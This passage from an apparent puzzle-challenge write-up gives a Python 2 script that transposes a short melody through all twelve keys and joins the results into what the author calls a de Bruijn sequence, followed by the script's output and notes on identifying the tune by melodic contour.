notes = ['C', 'C#', 'D', 'D#', 'E', 'F', 'F#', 'G', 'G#', 'A', 'A#', 'B']
tune = ['E', 'D#', 'E', 'D#', 'E', 'E', 'D#', 'E', 'F#', 'G#', 'F#', 'G#', 'A', 'B', 'A#', 'B', 'A#', 'B']

def adjust(offset):
    result = []
    for note in tune:
        index = notes.index(note)
        index += offset
        if index >= len(notes):
            index = index % len(notes)

        result.append(notes[index])
    return result

first = tune[0]
result = adjust(0)
last = result[-1]

offsets = [0]

sequence = result[:-5]

while True:
    offset = notes.index(last) - notes.index(first)
    if offset in offsets:
        # Loop detected
        break

    result = adjust(offset)
    print "Key is now", result[0]
    last = result[-1]

    offsets.append(offset)
    sequence += result[:-5]

print "de Bruijn sequence is", len(sequence), "notes long."
print "Without de Bruijn, it would've been", len(offsets)*len(tune), "notes long."
print " ".join(sequence)

The result was:

Key is now B
Key is now F#
Key is now C#
Key is now G#
Key is now D#
Key is now A#
Key is now F
Key is now C
Key is now G
Key is now D
Key is now A
de Bruijn sequence is 156 notes long.
Without de Bruijn, it would've been 216 notes long.
E D# E D# E E D# E F# G# F# G# A B A# B A# B B A# B C# D# C# D# E
F# F F# F F# F# F F# G# A# G# A# B C# C C# C C# C# C C# D# F D# F F
# G# G G# G G# G# G G# A# C A# C C# D# D D# D D# D# D D# F G F G G
# A# A A# A A# A# A A# C D C D D# F E F E F F E F G A G A A
# C B C B C C B C D E D E F G F# G F# G G F# G A B A B C
D C# D C# D D C# D E F# E F# G A G# A G# A A G# A B C# B C# D

What's even cooler is that the sequence goes through all of the keys before it repeats!

As we walk around the castle, everyone congratulates us on winning. However, we don't feel complete, as we're left with the nagging question of what in the world Alabaster was talking about with his Rachmaninoff-no-really-Mozart song. We have the notes, but not the tune. Can we figure out the song?

This one we solved two ways:

Musipedia.org allows you to search by melodic contour (Parsons code). By simply saying if each note progression goes up, down, or repeats, it can find the closest matches:

The Wedding of Figaro seems to match perfectly:

But still… why Rachmaninoff, then? The answer is found in the second method we used to figure this out:

And with that, Santa's parting words make a lot more sense too: